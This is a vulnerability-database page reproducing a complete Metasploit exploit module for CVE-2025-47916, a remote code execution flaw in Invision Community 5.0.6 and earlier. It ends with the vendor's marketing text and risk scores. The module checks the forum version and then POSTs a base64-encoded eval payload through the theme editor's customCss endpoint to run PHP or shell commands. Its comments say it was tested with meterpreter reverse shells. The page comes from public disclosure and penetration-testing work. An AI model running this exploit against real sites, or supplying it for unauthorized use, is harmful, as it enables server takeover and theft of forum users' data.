Lucene search
K

📄 Invision Community 5.0.6 CustomCss Remote Code Execution

🗓️ 22 May 2025 00:00:00Reported by EgiX, Valentin LobsteinType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 189 Views

Exploits Invision Community up to version five zero six via customCss with crafted content.

Related
Code
##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      prepend Msf::Exploit::Remote::AutoCheck
      include Msf::Payload::Php
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Invision Community 5.0.6 customCss RCE',
            'Description' => %q{
              Invision Community up to and including version 5.0.6 contains a remote code
              execution vulnerability in the theme editor's customCss endpoint. By crafting
              a specially formatted `content` parameter with a `{expression="…"}`
              construct, arbitrary PHP can be evaluated. This module leverages that flaw
              to execute payloads or system commands as the webserver user.
            },
            'Author' => [
              'Egidio Romano (EgiX)', # Vulnerability discovery & original PoC
              'Valentin Lobstein'     # Metasploit module
            ],
            'References' => [
              ['CVE', '2025-47916'],
              ['URL', 'https://karmainsecurity.com/KIS-2025-02'],
              ['URL', 'https://invisioncommunity.com']
            ],
            'License' => MSF_LICENSE,
            'Platform' => %w[php unix linux win],
            'Arch' => [ARCH_PHP, ARCH_CMD],
            'Targets' => [
              [
                'PHP In-Memory',
                {
                  'Platform' => 'php',
                  'Arch' => ARCH_PHP
                  # tested with php/meterpreter/reverse_tcp
                }
              ],
              [
                'Unix/Linux Command Shell',
                {
                  'Platform' => %w[unix linux],
                  'Arch' => ARCH_CMD
                  # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
                }
              ],
              [
                'Windows Command Shell',
                {
                  'Platform' => 'win',
                  'Arch' => ARCH_CMD
                  # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DisclosureDate' => '2025-05-16',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS]
            }
          )
        )
      end
    
      def check
        path = normalize_uri(target_uri.path, 'admin', 'install', 'eula.txt')
        res = send_request_cgi('uri' => path, 'method' => 'GET')
        unless res&.code == 200 && res.body =~ /^ IPS\ ([\d.]+) /
          return CheckCode::Unknown('Unable to retrieve or parse IPS version from EULA')
        end
    
        version = Rex::Version.new(Regexp.last_match(1))
        print_status("Detected IPS version: #{version}")
    
        if version.between?(Rex::Version.new('5.0.0'), Rex::Version.new('5.0.6'))
          CheckCode::Appears("IPS version #{version} is vulnerable (≤ 5.0.6)")
        else
          CheckCode::Safe("IPS version #{version} is not vulnerable")
        end
      end
    
      # I'll remove this method when PR #20160 is merged. I'm aware of it, thanks
      def php_exec_cmd(encoded_payload)
        vars = Rex::RandomIdentifier::Generator.new
        dis = '$' + vars[:dis]
        encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
        shell = <<-END_OF_PHP_CODE
            #{php_preamble(disabled_varname: dis)}
            $c = base64_decode("#{encoded_clean_payload}");
            #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
        END_OF_PHP_CODE
        return shell
      end
    
      def exploit
        raw = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
        b64 = Rex::Text.encode_base64(raw)
    
        expr = "{expression=\"die(eval(base64_decode('#{b64}')))\"}"
        post_data = {
          'app' => 'core',
          'module' => 'system',
          'controller' => 'themeeditor',
          'do' => 'customCss',
          'content' => expr
        }
    
        print_status("Sending exploit to #{rhost}:#{rport} ...")
        send_request_cgi(
          'uri' => normalize_uri(target_uri.path, 'index.php'),
          'method' => 'POST',
          'vars_post' => post_data
        )
      end
    end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 May 2025 00:00Current
8.6High risk
Vulners AI Score8.6
CVSS 3.19.8 - 10
EPSS0.84803
SSVC
189